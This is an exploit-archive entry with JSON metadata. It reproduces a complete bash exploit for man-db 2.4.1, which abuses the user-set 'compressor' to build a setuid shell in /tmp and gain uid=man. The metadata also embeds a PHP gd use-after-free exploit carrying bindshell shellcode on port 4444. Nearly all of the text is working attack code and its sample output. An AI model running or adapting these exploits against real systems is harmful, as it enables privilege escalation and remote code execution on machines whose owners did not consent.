man-db 2.4.1 open_cat_stream() Local uid=man Exploit
2003-08-06T00:00:00
ID 1337DAY-ID-7311 Type zdt Reporter vade79 Modified 2003-08-06T00:00:00
Description
Exploit for linux platform in category local exploits
====================================================
man-db 2.4.1 open_cat_stream() Local uid=man Exploit
====================================================
#!/bin/bash
# xmandb.sh: shell command file.
#
# man-db[v2.4.1-]: local uid=man exploit.
# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)
#
# open_cat_stream() privileged call exploit.
#
# i've been conversing with the new man-db maintainer, and after the
# initial post sent to bugtraq(which i forgot to inform him), i sent him
# an email highlighting another vulnerability i forgot to mention in the
# original advisory.
#
# once he checked it out, he noticed that the routine never dropped
# privileges before/after the potential buffer/elemental overflow occured,
# and executed the (user defined) "compressor" binary. making it
# pointless to exploit this via the overflow method, and all-purpose to
# exploit this via the privileged execve() call method.
#
# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),
# he noticed it before i did, so he's on the right track. :)
#
# example:
# [[email protected] v9]$ id
# uid=500(v9) gid=500(v9) groups=500(v9)
# [[email protected] v9]$ ./xmandb.sh
# [*] making fake manpage directories/files...
# [*] making runme, and mansh source files...
# [*] compiling runme source...
# [*] setting "compressor" to: /tmp/runme...
# [*] executing man-db/man...
# [*] cleaning up files...
# [*] success, entering shell.
# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh
# sh-2.04$ id
# uid=15(man) gid=500(v9) groups=500(v9)
# sh-2.04$
#
# (tested on redhat7.1, from src, should work out of the box everywhere)
MANBIN=/usr/bin/man
MANDIR=man_x
TMPDIR=/tmp
echo "man-db[v2.4.1-]: local uid=man exploit."
echo -e "by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n"
if [ ! "`$MANBIN -V 2>/dev/null`" ]
then
echo "[!] \"$MANBIN\" does not appear to be man-db, failed."
exit
fi
umask 002
cd $TMPDIR
echo "[*] making fake manpage directories/files..."
mkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1
touch ${MANDIR}/man1/x.1
echo "[*] making runme, and mansh source files..."
cat <<EOF>runme.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
int main(int argc,char **argv){
setreuid(geteuid(),geteuid());
system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh");
chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
unlink(argv[0]);
exit(0);
}
EOF
cat <<EOF>mansh.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(){
setreuid(geteuid(),geteuid());
execl("/bin/sh","sh",0);
exit(0);
}
EOF
echo "[*] compiling runme source..."
cc runme.c -o runme
echo "[*] setting \"compressor\" to: ${TMPDIR}/runme..."
echo "DEFINE compressor ${TMPDIR}/runme">~/.manpath
echo "[*] executing man-db/man..."
$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1
echo "[*] cleaning up files..."
rm -rf $MANDIR mansh.c runme.c runme ~/.manpath
if test -u "${TMPDIR}/mansh"
then
echo "[*] success, entering shell."
ls -l ${TMPDIR}/mansh
${TMPDIR}/mansh
else
echo "[!] exploit failed."
rm -rf ${TMPDIR}/mansh
fi
exit
# 0day.today [2018-04-14] #
{"id": "1337DAY-ID-7311", "bulletinFamily": "exploit", "title": "man-db 2.4.1 open_cat_stream() Local uid=man Exploit ", "description": "Exploit for linux platform in category local exploits", "published": "2003-08-06T00:00:00", "modified": "2003-08-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/7311", "reporter": "vade79", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-14T23:54:11", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for linux platform in category local exploits", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T01:50:12", "value": 3.8, "vector": "AV:L/AC:M/Au:M/C:P/I:P/A:P/"}}, "hash": "d05a90c3fe8222bf286274a1aab46846b5f0013eb429c47e7ab33b2be63e54f4", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "67c30d2ec467d81dd709a2178aa6ace7", "key": "sourceHref"}, {"hash": "1466d24f65fab971fd9c0eef16c44ffb", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "427c9cb171731fe1230965d21db75dd0", "key": "sourceData"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1466d24f65fab971fd9c0eef16c44ffb", "key": "published"}, {"hash": "275a765e4d222c8cbed80585b1fba5c5", "key": "title"}, {"hash": "e18581c73c0a36d1d2c1b38c096d4486", "key": "reporter"}, {"hash": "cbd879f87043e421582934be10c12e97", "key": "href"}], "history": [], "href": "http://0day.today/exploit/description/7311", "id": "1337DAY-ID-7311", "lastseen": "2016-04-20T01:50:12", "modified": "2003-08-06T00:00:00", "objectVersion": "1.0", "published": "2003-08-06T00:00:00", "references": [], "reporter": "vade79", "sourceData": "====================================================\r\nman-db 2.4.1 open_cat_stream() Local uid=man Exploit \r\n====================================================\r\n\r\n\r\n#!/bin/bash\r\n# xmandb.sh: shell command file.\r\n#\r\n# man-db[v2.4.1-]: local uid=man exploit.\r\n# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\r\n#\r\n# open_cat_stream() privileged call exploit.\r\n#\r\n# i've been conversing with the new man-db maintainer, and after the\r\n# initial post sent to bugtraq(which i forgot to inform him), i sent him\r\n# an email highlighting another vulnerability i forgot to mention in the\r\n# original advisory.\r\n#\r\n# once he checked it out, he noticed that the routine never dropped\r\n# privileges before/after the potential buffer/elemental overflow occured,\r\n# and executed the (user defined) \"compressor\" binary. making it\r\n# pointless to exploit this via the overflow method, and all-purpose to\r\n# exploit this via the privileged execve() call method.\r\n#\r\n# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),\r\n# he noticed it before i did, so he's on the right track. :)\r\n#\r\n# example:\r\n# [v9@localhost v9]$ id\r\n# uid=500(v9) gid=500(v9) groups=500(v9)\r\n# [v9@localhost v9]$ ./xmandb.sh\r\n# [*] making fake manpage directories/files...\r\n# [*] making runme, and mansh source files...\r\n# [*] compiling runme source...\r\n# [*] setting \"compressor\" to: /tmp/runme...\r\n# [*] executing man-db/man...\r\n# [*] cleaning up files...\r\n# [*] success, entering shell.\r\n# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh\r\n# sh-2.04$ id\r\n# uid=15(man) gid=500(v9) groups=500(v9)\r\n# sh-2.04$ \r\n#\r\n# (tested on redhat7.1, from src, should work out of the box everywhere)\r\n\r\nMANBIN=/usr/bin/man\r\nMANDIR=man_x\r\nTMPDIR=/tmp\r\necho \"man-db[v2.4.1-]: local uid=man exploit.\"\r\necho -e \"by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\"\r\nif [ ! \"`$MANBIN -V 2>/dev/null`\" ]\r\nthen\r\n echo \"[!] \\\"$MANBIN\\\" does not appear to be man-db, failed.\"\r\n exit\r\nfi\r\numask 002\r\ncd $TMPDIR\r\necho \"[*] making fake manpage directories/files...\"\r\nmkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1\r\ntouch ${MANDIR}/man1/x.1\r\necho \"[*] making runme, and mansh source files...\"\r\ncat <<EOF>runme.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\nint main(int argc,char **argv){\r\n setreuid(geteuid(),geteuid());\r\n system(\"cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh\");\r\n chmod(\"${TMPDIR}/mansh\",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);\r\n unlink(argv[0]);\r\n exit(0);\r\n}\r\nEOF\r\ncat <<EOF>mansh.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\nint main(){\r\n setreuid(geteuid(),geteuid());\r\n execl(\"/bin/sh\",\"sh\",0);\r\n exit(0);\r\n}\r\nEOF\r\necho \"[*] compiling runme source...\"\r\ncc runme.c -o runme\r\necho \"[*] setting \\\"compressor\\\" to: ${TMPDIR}/runme...\"\r\necho \"DEFINE compressor ${TMPDIR}/runme\">~/.manpath\r\necho \"[*] executing man-db/man...\"\r\n$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1\r\necho \"[*] cleaning up files...\"\r\nrm -rf $MANDIR mansh.c runme.c runme ~/.manpath\r\nif test -u \"${TMPDIR}/mansh\"\r\nthen\r\n echo \"[*] success, entering shell.\"\r\n ls -l ${TMPDIR}/mansh\r\n ${TMPDIR}/mansh\r\nelse\r\n echo \"[!] exploit failed.\"\r\n rm -rf ${TMPDIR}/mansh\r\nfi\r\nexit\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/7311", "title": "man-db 2.4.1 open_cat_stream() Local uid=man Exploit ", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:50:12"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8be7a8b03e0d0b6e92b55fa1f40b9528"}, {"key": "href", "hash": "b0c54a7de1fa5fc9b82baa24b84c0b37"}, {"key": "modified", "hash": "1466d24f65fab971fd9c0eef16c44ffb"}, {"key": "published", "hash": "1466d24f65fab971fd9c0eef16c44ffb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e18581c73c0a36d1d2c1b38c096d4486"}, {"key": "sourceData", "hash": "7bc60279d1b7e77f8248cc32d71ea94b"}, {"key": "sourceHref", "hash": "73ca7305ecf96be55461e1b81706d449"}, {"key": "title", "hash": "275a765e4d222c8cbed80585b1fba5c5"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "f8629bd87376d27e691219b2285b7755f97ccee64de90efcf635a4d32e2df436", "viewCount": 0, "enchantments": {"vulnersScore": 3.8}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/7311", "sourceData": "====================================================\r\nman-db 2.4.1 open_cat_stream() Local uid=man Exploit \r\n====================================================\r\n\r\n\r\n#!/bin/bash\r\n# xmandb.sh: shell command file.\r\n#\r\n# man-db[v2.4.1-]: local uid=man exploit.\r\n# by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\r\n#\r\n# open_cat_stream() privileged call exploit.\r\n#\r\n# i've been conversing with the new man-db maintainer, and after the\r\n# initial post sent to bugtraq(which i forgot to inform him), i sent him\r\n# an email highlighting another vulnerability i forgot to mention in the\r\n# original advisory.\r\n#\r\n# once he checked it out, he noticed that the routine never dropped\r\n# privileges before/after the potential buffer/elemental overflow occured,\r\n# and executed the (user defined) \"compressor\" binary. making it\r\n# pointless to exploit this via the overflow method, and all-purpose to\r\n# exploit this via the privileged execve() call method.\r\n#\r\n# best of luck to the new maintainer(Colin Watson<cjwatson debian org>),\r\n# he noticed it before i did, so he's on the right track. :)\r\n#\r\n# example:\r\n# [[email\u00a0protected] v9]$ id\r\n# uid=500(v9) gid=500(v9) groups=500(v9)\r\n# [[email\u00a0protected] v9]$ ./xmandb.sh\r\n# [*] making fake manpage directories/files...\r\n# [*] making runme, and mansh source files...\r\n# [*] compiling runme source...\r\n# [*] setting \"compressor\" to: /tmp/runme...\r\n# [*] executing man-db/man...\r\n# [*] cleaning up files...\r\n# [*] success, entering shell.\r\n# -rws--x--- 1 man v9 13963 Jun 13 20:09 /tmp/mansh\r\n# sh-2.04$ id\r\n# uid=15(man) gid=500(v9) groups=500(v9)\r\n# sh-2.04$ \r\n#\r\n# (tested on redhat7.1, from src, should work out of the box everywhere)\r\n\r\nMANBIN=/usr/bin/man\r\nMANDIR=man_x\r\nTMPDIR=/tmp\r\necho \"man-db[v2.4.1-]: local uid=man exploit.\"\r\necho -e \"by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\"\r\nif [ ! \"`$MANBIN -V 2>/dev/null`\" ]\r\nthen\r\n echo \"[!] \\\"$MANBIN\\\" does not appear to be man-db, failed.\"\r\n exit\r\nfi\r\numask 002\r\ncd $TMPDIR\r\necho \"[*] making fake manpage directories/files...\"\r\nmkdir $MANDIR ${MANDIR}/man1 ${MANDIR}/cat1\r\ntouch ${MANDIR}/man1/x.1\r\necho \"[*] making runme, and mansh source files...\"\r\ncat <<EOF>runme.c\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\nint main(int argc,char **argv){\r\n setreuid(geteuid(),geteuid());\r\n system(\"cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh\");\r\n chmod(\"${TMPDIR}/mansh\",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);\r\n unlink(argv[0]);\r\n exit(0);\r\n}\r\nEOF\r\ncat <<EOF>mansh.c\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\nint main(){\r\n setreuid(geteuid(),geteuid());\r\n execl(\"/bin/sh\",\"sh\",0);\r\n exit(0);\r\n}\r\nEOF\r\necho \"[*] compiling runme source...\"\r\ncc runme.c -o runme\r\necho \"[*] setting \\\"compressor\\\" to: ${TMPDIR}/runme...\"\r\necho \"DEFINE compressor ${TMPDIR}/runme\">~/.manpath\r\necho \"[*] executing man-db/man...\"\r\n$MANBIN -M ${TMPDIR}/$MANDIR -P /bin/true x 1>/dev/null 2>&1\r\necho \"[*] cleaning up files...\"\r\nrm -rf $MANDIR mansh.c runme.c runme ~/.manpath\r\nif test -u \"${TMPDIR}/mansh\"\r\nthen\r\n echo \"[*] success, entering shell.\"\r\n ls -l ${TMPDIR}/mansh\r\n ${TMPDIR}/mansh\r\nelse\r\n echo \"[!] exploit failed.\"\r\n rm -rf ${TMPDIR}/mansh\r\nfi\r\nexit\r\n\r\n\r\n\n# 0day.today [2018-04-14] #"}
{"result": {"zdt": [{"lastseen": "2018-01-11T03:09:30", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 2, "reporter": "Stefan Esser", "published": "2007-03-20T00:00:00", "title": "PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-11T03:09:30", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/", "value": 4.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-03-20T00:00:00", "id": "1337DAY-ID-7656", "href": "https://0day.today/exploit/description/7656", "sourceData": "=================================================================\r\nPHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit\r\n=================================================================\r\n\r\n\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP gd already freed resource usage exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // linux x86 bindshell on port 4444 from Metasploit\r\n $shellcode = \"\\x29\\xc9\\x83\\xe9\\xeb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x46\".\r\n \"\\x32\\x3c\\xe5\\x83\\xeb\\xfc\\xe2\\xf4\\x77\\xe9\\x6f\\xa6\\x15\\x58\\x3e\\x8f\".\r\n \"\\x20\\x6a\\xa5\\x6c\\xa7\\xff\\xbc\\x73\\x05\\x60\\x5a\\x8d\\x57\\x6e\\x5a\\xb6\".\r\n \"\\xcf\\xd3\\x56\\x83\\x1e\\x62\\x6d\\xb3\\xcf\\xd3\\xf1\\x65\\xf6\\x54\\xed\\x06\".\r\n \"\\x8b\\xb2\\x6e\\xb7\\x10\\x71\\xb5\\x04\\xf6\\x54\\xf1\\x65\\xd5\\x58\\x3e\\xbc\".\r\n \"\\xf6\\x0d\\xf1\\x65\\x0f\\x4b\\xc5\\x55\\x4d\\x60\\x54\\xca\\x69\\x41\\x54\\x8d\".\r\n \"\\x69\\x50\\x55\\x8b\\xcf\\xd1\\x6e\\xb6\\xcf\\xd3\\xf1\\x65\";\r\n\r\n // Offsets used for the overwrite (will be overwritten by findOffsets()\r\n $offset_1 = 0x55555555;\r\n $offset_2 = 0x66666666;\r\n \r\n findOffsets(); // Comment out if you want to just test the crash\r\n\r\n class dummyclass { }\r\n\r\n function myErrorHandler()\r\n {\r\n imagedestroy($GLOBALS['img']);\r\n \r\n // Clipping\r\n $GLOBALS['x'] = str_repeat(chr(0), 7311);\r\n $GLOBALS['x'][7310] = chr(0x00); \r\n $GLOBALS['x'][7309] = chr(0x01); \r\n $GLOBALS['x'][7308] = chr(0x00); \r\n\r\n $GLOBALS['x'][7307] = chr(0x7f); \r\n $GLOBALS['x'][7306] = chr(0xff); \r\n $GLOBALS['x'][7305] = chr(0xff); \r\n $GLOBALS['x'][7304] = chr(0xff); \r\n\r\n $GLOBALS['x'][7303] = chr(0); \r\n $GLOBALS['x'][7302] = chr(0); \r\n $GLOBALS['x'][7301] = chr(0); \r\n $GLOBALS['x'][7300] = chr(0); \r\n\r\n $GLOBALS['x'][7299] = chr(0x80); \r\n $GLOBALS['x'][7298] = chr(0); \r\n $GLOBALS['x'][7297] = chr(0); \r\n $GLOBALS['x'][7296] = chr(0); \r\n\r\n // True Color Image\r\n $GLOBALS['x'][0x1c38] = chr(1);\r\n // True Color Pixelmap (1st entry must be 0)\r\n $GLOBALS['x'][0x1c3c] = chr(0x08);\r\n $GLOBALS['x'][0x1c3d] = chr(0x80);\r\n $GLOBALS['x'][0x1c3e] = chr(0x04);\r\n $GLOBALS['x'][0x1c3f] = chr(0x08);\r\n\r\n return true;\r\n }\r\n \r\n function poke($addr, $value)\r\n {\r\n $GLOBALS['img'] = imagecreate(1, 1);\r\n imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(), $value);\r\n }\r\n \r\n function peek($addr)\r\n {\r\n $GLOBALS['img'] = imagecreate(1, 1);\r\n return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass());\r\n }\r\n \r\n printf(\"Using offsets %08x and %08x\\n\", $offset_1, $offset_2);\r\n \r\n error_reporting(E_ALL);\r\n set_error_handler(\"myErrorHandler\");\r\n poke($offset_2, $offset_1);\r\n unset($d);\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n // This function uses the substr_compare() vulnerability\r\n // to get the offsets. \r\n \r\n function findOffsets()\r\n {\r\n global $offset_1, $offset_2, $shellcode;\r\n // We need to NOT clear these variables,\r\n // otherwise the heap is too segmented\r\n global $memdump, $d, $arr;\r\n \r\n $sizeofHashtable = 39;\r\n $maxlong = 0x7fffffff;\r\n\r\n // Signature of a big endian Hashtable of size 256 with 1 element\r\n $search = \"\\x00\\x01\\x00\\x00\\xff\\x00\\x00\\x00\\x01\\x00\\x00\\x00\";\r\n\r\n $memdump = str_repeat(\"A\", 18192);\r\n for ($i=0; $i<400; $i++) {\r\n\t $d[$i]=array();\r\n }\r\n unset($d[350]);\r\n $x = str_repeat(\"\\x01\", $sizeofHashtable);\r\n unset($d[351]);\r\n unset($d[352]);\r\n $arr = array();\r\n for ($i=0; $i<129; $i++) { $arr[$i] = 1; }\r\n $arr[$shellcode] = 1;\r\n for ($i=0; $i<129; $i++) { unset($arr[$i]); }\r\n\r\n // If the libc memcmp leaks the information use it\r\n // otherwise we only get a case insensitive memdump\r\n $b = substr_compare(chr(65),chr(0),0,1,false) != 65;\r\n\r\n for ($i=0; $i<18192; $i++) {\r\n $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n if ($y-$Y == 1 || $Y-$y==1){\r\n $y = chr($y);\r\n if ($b && strtoupper($y)!=$y) {\r\n if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {\r\n $y = strtoupper($y);\r\n }\r\n }\r\n $memdump[$i] = $y;\r\n } else {\r\n \t $y = substr_compare($x, chr(1), $i+1, $maxlong, $b);\r\n $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);\r\n if ($y-$Y != 1 && $Y-$y!=1){\r\n\t $memdump[$i] = chr(1);\r\n } else {\r\n $memdump[$i] = chr(0);\r\n } \r\n }\r\n }\r\n \r\n // Search shellcode and hashtable and calculate memory address\r\n $pos_shellcode = strpos($memdump, $shellcode);\r\n $pos_hashtable = strpos($memdump, $search);\r\n \r\n if ($pos_shellcode == 0 || $pos_hashtable == 0) {\r\n die (\"Unable to find offsets\");\r\n }\r\n \r\n $addr = substr($memdump, $pos_hashtable+6*4, 4);\r\n $addr = unpack(\"L\", $addr);\r\n // Fill in both offsets \r\n $offset_1 = $addr[1] + 32;\r\n $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;\r\n }\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7656"}]}}